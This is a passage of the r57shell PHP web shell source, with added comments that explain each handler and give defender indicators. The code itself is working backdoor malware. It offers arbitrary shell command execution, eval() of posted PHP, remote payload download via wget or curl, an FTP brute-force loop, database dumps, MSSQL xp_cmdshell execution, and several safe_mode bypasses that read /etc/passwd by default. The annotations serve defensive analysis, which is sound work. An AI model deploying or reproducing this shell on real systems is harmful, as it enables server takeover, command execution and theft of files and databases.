1769 or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
1770 }
// Remote download: builds a command line for one of several HTTP client programs to fetch rem_file
// into loc_file; the resulting string is run later through ex(). Both values are concatenated
// unescaped. The case labels are bare words, which relies on old PHP treating undefined constants as
// strings (PHP 8 raises an Error instead).
// Defender notes: the web-server account invoking wget, fetch, lynx, links, GET or curl is an indicator;
// egress filtering on the web tier blocks this staging step.
1771 if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
1772 {
1773 switch($_POST['with'])
1774 {
1775 case wget:
1776 $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1777 break;
1778 case fetch:
1779 $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
1780 break;
1781 case lynx:
1782 $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1783 break;
1784 case links:
1785 $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1786 break;
1787 case GET:
1788 $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1789 break;
1790 case curl:
1791 $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1792 break;
1793 }
1794 }
// cmd=ftp_file_up / ftp_file_down: transfers one file between the local filesystem and an FTP server
// named in the request, using PHP's FTP extension (no shell involved). Server, port, login and
// password all come from the request; the port defaults to 21 and the connect timeout is 10 seconds.
// split() was removed in PHP 7, so this code only runs on older interpreters.
// NOTE(review): the transfer mode is read from $_POST['mode'], while the FTP form visible further down
// names its field ftp_mode -- the key looks unset here; verify.
// Defender notes: outbound FTP control connections originating from the web-server process are unusual
// for most applications and worth alerting on.
1795 if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
1796 {
1797 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1798 if(empty($ftp_port)) { $ftp_port = 21; }
1799 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1800 if(!$connection) { err(3); }
1801 else
1802 {
1803 if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
1804 else
1805 {
// For a download whose local target equals $dir, the remote file's base name is appended to it.
1806 if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
1807 if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
1808 }
1809 }
// Called even when the connection failed; the @ hides the resulting error.
1810 @ftp_close($connection);
1811 $_POST['cmd'] = "";
1812 }
// cmd=ftp_brute, preparation step: checks that the FTP server is reachable and that get_users()
// (defined elsewhere; presumably returns local account names -- confirm) yields a list. On either
// failure the command is cleared so the login loop further down is skipped. $ftp_server, $ftp_port
// and $users stay set for that loop.
1813 if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
1814 {
1815 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1816 if(empty($ftp_port)) { $ftp_port = 21; }
1817 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1818 if(!$connection) { err(3); $_POST['cmd'] = ""; }
1819 else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
1820 @ftp_close($connection);
1821 }
// Main dispatcher. With no command left at this point a directory listing is chosen: `dir` or `ls -lia`
// through the shell when $safe_mode is off, or the PHP-only 'safe_dir' listing when it is on.
// The command string is echoed into the page without escaping; the output goes into a textarea.
1822 echo $table_up3;
1823 if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
1824 else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
1825 echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
// safe_mode branch: no shell is available, so every case below goes through a PHP or extension API
// instead. The test1..test8 cases each read a file or run a command through a different extension;
// presumably these were paths that old PHP versions did not subject to safe_mode/open_basedir checks --
// confirm per case against the PHP version in use.
// Defender notes: safe_mode was removed in PHP 5.4 and was never a security boundary. Keep unused
// extensions (curl, imap, mbstring mail functions, legacy DB clients) out of production builds and
// run database accounts without FILE / xp_cmdshell rights.
1826 if($safe_mode)
1827 {
1828 switch($_POST['cmd'])
1829 {
// safe_dir: lists $dir with dir()/stat(). stat() is given the bare entry name, so the result depends
// on the current working directory being $dir (presumably set earlier in the file -- verify).
1830 case 'safe_dir':
1831 $d=@dir($dir);
1832 if ($d)
1833 {
1834 while (false!==($file=$d->read()))
1835 {
1836 if ($file=="." || $file=="..") continue;
1837 @clearstatcache();
1838 list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
1839 if(!$unix){
1840 echo date("d.m.Y H:i",$mtime);
1841 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
1842 }
1843 else{
1844 $owner = @posix_getpwuid($uid);
1845 $grgid = @posix_getgrgid($gid);
1846 echo $inode." ";
1847 echo perms(@fileperms($file));
1848 printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
1849 echo date("d.m.Y H:i ",$mtime);
1850 }
1851 echo "$file\n";
1852 }
1853 $d->close();
1854 }
// _text29 is written as a bare word here, unlike the quoted '_textNN' keys used elsewhere in the file.
1855 else echo $lang[$language._text29];
1856 break;
// test1: reads a local file through curl's file:// scheme; the content is echoed unescaped.
1857 case 'test1':
1858 $ci = @curl_init("file://".$_POST['test1_file']."");
1859 $cf = @curl_exec($ci);
1860 echo $cf;
1861 break;
// test2: include() on a request-supplied path. Besides displaying the file, any PHP code it contains
// is executed.
1862 case 'test2':
1863 @include($_POST['test2_file']);
1864 break;
// test3: reads a file through a local MySQL server with LOAD DATA INFILE into a scratch table.
// The file name is concatenated into the SQL text. Indicator: table `temp_r57_table` (dropped at the
// end, but visible in query logs).
1865 case 'test3':
1866 if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
1867 $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
1868 if($db)
1869 {
1870 if(@mysql_select_db($_POST['test3_md'],$db))
1871 {
1872 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1873 @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
1874 @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
1875 $r = @mysql_query("SELECT * FROM temp_r57_table");
1876 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
1877 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1878 }
1879 else echo "[-] ERROR! Can't select database";
1880 @mysql_close($db);
1881 }
1882 else echo "[-] ERROR! Can't connect to mysql server";
1883 break;
// test4: runs an operating-system command through MSSQL's master.dbo.xp_cmdshell and reads the output
// back from a scratch table. Indicator: table `r57_temp_table` and xp_cmdshell use by the web
// application's SQL login. Output rows are echoed unescaped.
1884 case 'test4':
1885 if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
1886 $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
1887 if($db)
1888 {
1889 if(@mssql_select_db($_POST['test4_md'],$db))
1890 {
1891 @mssql_query("drop table r57_temp_table",$db);
1892 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
1893 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
1894 $res = mssql_query("select * from r57_temp_table",$db);
1895 while(($row=@mssql_fetch_row($res)))
1896 {
1897 echo $row[0]."\r\n";
1898 }
1899 @mssql_query("drop table r57_temp_table",$db);
1900 }
1901 else echo "[-] ERROR! Can't select database";
1902 @mssql_close($db);
1903 }
1904 else echo "[-] ERROR! Can't connect to MSSQL server";
1905 break;
// test5: passes extra command-line parameters to the mail program via mb_send_mail() so that a
// request-supplied file is used as its configuration (-C) and a log is written to /tmp/mb_send_mail
// (-X), which is then displayed. Indicator: the file /tmp/mb_send_mail, which is not removed afterwards.
1906 case 'test5':
1907 if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
1908 $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
1909 @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
1910 $lines = file ('/tmp/mb_send_mail');
1911 foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
1912 break;
// test6: directory listing through the IMAP extension (imap_open on a local path, then imap_list).
1913 case 'test6':
1914 $stream = @imap_open('/etc/passwd', "", "");
1915 $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
1916 for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
1917 @imap_close($stream);
1918 break;
// test7: file read through the IMAP extension (the file is opened as a mailbox and message 1 is printed).
1919 case 'test7':
1920 $stream = @imap_open($_POST['test7_file'], "", "");
1921 $str = @imap_body($stream, 1);
1922 echo $str;
1923 @imap_close($stream);
1924 break;
// test8: file copy where the source is addressed through the compress.zlib:// stream wrapper.
1925 case 'test8':
1926 if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
1927 else echo $lang[$language.'_text119'];
1928 break;
1929 }
1930 }
// Without safe_mode: every command string that is not one of the four names handled separately below
// is handed to ex() and its output is printed HTML-escaped. This is the arbitrary command execution
// path. On non-Unix hosts the output is first converted between Cyrillic code pages.
// Defender notes: the reliable control is to keep this file from being written or executed at all
// (non-writable web roots, no PHP execution in upload directories) and to disable the PHP
// process-execution functions when the application does not need them.
1931 else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
1932 $cmd_rep = ex($_POST['cmd']);
1933 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
1934 else { echo @htmlspecialchars($cmd_rep)."\n"; }}
// cmd=ftp_brute, login loop: for every name in $users a fresh FTP connection is opened and a login with
// the name as its own password is tried; with the 'reverse' field set, the reversed name is tried as
// well. $ftp_server, $ftp_port and $users were set by the preparation step earlier in the file.
// The reported attempt count is doubled when 'reverse' is set, whether or not the second try ran.
// Defender notes: this shows up in FTP server logs as a burst of failed logins, one connection per
// account, coming from the web host itself. Accounts whose password equals or mirrors the user name are
// what it finds; password policy and FTP login rate limiting address it.
1935 if ($_POST['cmd']=="ftp_brute")
1936 {
1937 $suc = 0;
1938 foreach($users as $user)
1939 {
1940 $connection = @ftp_connect($ftp_server,$ftp_port,10);
1941 if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
1942 else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
1943 @ftp_close($connection);
1944 }
1945 echo "\r\n-------------------------------------\r\n";
1946 $count = count($users);
1947 if(isset($_POST['reverse'])) { $count *= 2; }
1948 echo $lang[$language.'_text97'].$count."\r\n";
1949 echo $lang[$language.'_text98'].$suc."\r\n";
1950 }
// cmd=php_eval: removes PHP open and close tags from the posted text and passes the rest to eval().
// This is arbitrary PHP code execution inside the web-server process, independent of the shell path.
// Defender notes: eval() is a language construct and cannot be turned off with disable_functions;
// static scanners and YARA rules typically key on eval() applied to request data.
1951 if ($_POST['cmd']=="php_eval"){
1952 $eval = @str_replace("<?","",$_POST['php_eval']);
1953 $eval = @str_replace("?>","",$eval);
1954 @eval($eval);}
// cmd=mysql_dump: dumps one table through the my_sql class (defined elsewhere in the file), using
// connection details taken entirely from the request. The dump is printed into the page, or written to
// the file named in dif_name when the 'dif' field is set.
// The dump file is opened before the connection is attempted, so a failed dump still truncates or
// creates it; the handle is never closed in this block.
// Defender notes: this is a bulk data-exfiltration path. Database accounts used by web applications
// should be limited to the schema and privileges the application needs.
1955 if ($_POST['cmd']=="mysql_dump")
1956 {
1957 if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
1958 $sql = new my_sql();
1959 $sql->db = $_POST['db'];
1960 $sql->host = $_POST['db_server'];
1961 $sql->port = $_POST['db_port'];
1962 $sql->user = $_POST['mysql_l'];
1963 $sql->pass = $_POST['mysql_p'];
1964 $sql->base = $_POST['mysql_db'];
1965 if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
1966 else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
1967 else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
1968 else {
1969 if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
1970 else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
1971 else { echo "[-] ERROR! Can't write in dump file"; }
1972 }
1973 }
// Closes the output textarea and opens the table that holds the forms rendered below.
1974 echo "</textarea></div>";
1975 echo "</b>";
1976 echo "</td></tr></table>";
1977 echo "<table width=100% cellpadding=0 cellspacing=0>";
// Returns the HTML for a clickable section title. Clicking it calls the client-side function
// change_divst() (defined outside this part of the file) with the section id.
// $title and $id are inserted into the markup without escaping.
1978 function div_title($title, $id)
1979 {
1980 return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
1981 }
// Returns the opening <div> tag for a section. The section starts hidden when a cookie named after the
// section id exists and compares loosely equal to 0; otherwise it starts visible.
// $id is inserted into the markup without escaping (all callers in view pass literal ids).
1982 function div($id)
1983 {
1984 if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
1985 return '<div id="'.$id.'">';
1986 }
// Form rendering, part 1. The helpers sr(), in() and ws() and the markup fragments $fs, $fe, $ts, $te,
// $table_up1, $table_up2, $table_end1 and $arrow are defined outside this part of the file; from their
// use here sr() appears to emit a table row and in() an <input> element -- confirm.
// Each form posts back to this script with a hidden `cmd` value selecting the handler.
// Defender notes: the POST field names used in this interface (cmd, dir, e_name, mk_name, param1, param2,
// what, action) are stable request-body indicators for WAF or IDS rules. Whether in() escapes the
// request values it is given as defaults is not visible here.
//
// Command form (safe_mode off: free-text cmd plus working directory) or, with safe_mode on, a
// directory-listing form that posts cmd=safe_dir.
1987 if(!$safe_mode){
1988 echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
1989 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
1990 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
1991 echo $te.'</div>'.$table_end1.$fe;
1992 }
1993 else{
1994 echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
1995 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
1996 echo $te.'</div>'.$table_end1.$fe;
1997 }
// File editor form (cmd=edit_file), always shown.
1998 echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
1999 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
2000 echo $te.'</div>'.$table_end1.$fe;
// Create/delete file-or-directory form (cmd=mk); only rendered with safe_mode on, where the shell
// equivalents are unavailable.
2001 if($safe_mode){
2002 echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
2003 echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
2004 echo $te.'</div>'.$table_end1.$fe;
2005 }
// chmod/chown/chgrp form (cmd=ch_); safe_mode on Unix only. param1/param2 are read without an
// existence check.
2006 if($safe_mode && $unix){
2007 echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
2008 echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2009 echo $te.'</div>'.$table_end1.$fe;
2010 }
// Form rendering, part 2: command aliases, text search and the PHP eval box.
//
// Alias selector (safe_mode off): one <option> per key of $aliases; the alias names are written into
// the markup unescaped.
2011 if(!$safe_mode){
2012 $aliases2 = '';
2013 foreach ($aliases as $alias_name=>$alias_cmd)
2014 {
2015 $aliases2 .= "<option>$alias_name</option>";
2016 }
2017 echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
2018 echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2019 echo $te.'</div>'.$table_end1.$fe;
2020 }
// Text search form posting cmd=search_text. No handler for that value is visible in this part of the
// file; presumably it is handled earlier -- verify.
2021 echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
2022 echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2023 echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2024 echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2025 echo $te.'</div>'.$table_end1.$fe;
// Shell-based search form (cmd=find_text, safe_mode off on Unix); its fields feed the find/grep command
// line built earlier in the file.
2026 if(!$safe_mode && $unix){
2027 echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
2028 echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2029 echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2030 echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
2031 echo $te.'</div>'.$table_end1.$fe;
2032 }
// PHP eval box (cmd=php_eval), shown regardless of safe_mode. The previously posted code is echoed back
// into the textarea without escaping; the default text is a commented-out sample.
// Defender notes: the literal default text in this textarea, including the file name r57shell.php, is a
// convenient static signature for content scanning of web roots.
2033 echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
2034 echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
2035 echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
2036 echo "</textarea>";
2037 echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2038 echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2039 echo "</div></div></font>";
2040 echo $table_end1.$fe;
// Form rendering, part 3: one form per safe_mode test case (cmd=test1 .. test8), each shown only when
// safe_mode is on and the extension it depends on is available. The matching handlers are in the
// safe_mode switch earlier in the file.
// Defender notes: the POST field names test1_file .. test8_file2 and the defaults filled in here
// (/etc/passwd as the target file, database logins root / sa with the password "password") are
// request-body indicators. The database defaults only work against servers left with weak credentials.
//
// test1: file read via curl.
2041 if($safe_mode&&$curl_on)
2042 {
2043 echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
2044 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2045 echo $te.'</div>'.$table_end1.$fe;
2046 }
// test2: file read via include().
2047 if($safe_mode)
2048 {
2049 echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
2050 echo "<table class=table1 width=100% align=center>";
2051 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2052 echo $te.'</div>'.$table_end1.$fe;
2053 }
// test3: file read via MySQL (database, login, password, port, file).
2054 if($safe_mode&&$mysql_on)
2055 {
2056 echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
2057 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2058 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2059 echo $te.'</div>'.$table_end1.$fe;
2060 }
// test4: command execution via MSSQL (database, login, password, port, command).
2061 if($safe_mode&&$mssql_on)
2062 {
2063 echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
2064 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2065 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2066 echo $te.'</div>'.$table_end1.$fe;
2067 }
// test5: file read via mb_send_mail() (Unix only).
2068 if($safe_mode&&$unix&&function_exists('mb_send_mail')){
2069 echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
2070 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2071 echo $te.'</div>'.$table_end1.$fe;
2072 }
// test6: directory listing via imap_list().
2073 if($safe_mode&&function_exists('imap_list')){
2074 echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
2075 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2076 echo $te.'</div>'.$table_end1.$fe;
2077 }
// test7: file read via imap_body().
2078 if($safe_mode&&function_exists('imap_body')){
2079 echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
2080 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2081 echo $te.'</div>'.$table_end1.$fe;
2082 }
// test8: file copy via the compress.zlib:// wrapper (source and destination).
2083 if($safe_mode)
2084 {
2085 echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
2086 echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
2087 echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2088 echo $te.'</div>'.$table_end1.$fe;
2089 }
// Form rendering, part 4: file transfer forms.
//
// Upload form (multipart POST, field `userfile`, optional `new_name`), shown only when the php.ini
// setting file_uploads is enabled. This form opens its own <form> tag instead of using $fs.
// Defender notes: multipart POSTs carrying a `userfile` part to a script that is not a known upload
// endpoint are an indicator; disabling PHP execution in writable directories limits what an upload
// can achieve.
2090 if(@ini_get('file_uploads')){
2091 echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2092 echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
2093 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
2094 echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2095 echo $te.'</div>'.$table_end1.$fe;
2096 }
// Remote download form (safe_mode off on Unix): selects the client program (`with`) and the remote and
// local file names consumed by the download handler earlier in the file.
2097 if(!$safe_mode&&$unix){
2098 echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
2099 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2100 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2101 echo $te.'</div>'.$table_end1.$fe;
2102 }
// Download-to-browser form (cmd=download_file; its handler is not visible in this part of the file).
// Compression choices are offered only for the zlib/bzip2 functions that exist; 'none' is preselected.
2103 echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
2104 echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
2105 $arh = $lang[$language.'_text92'];
2106 if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
2107 if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
2108 if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
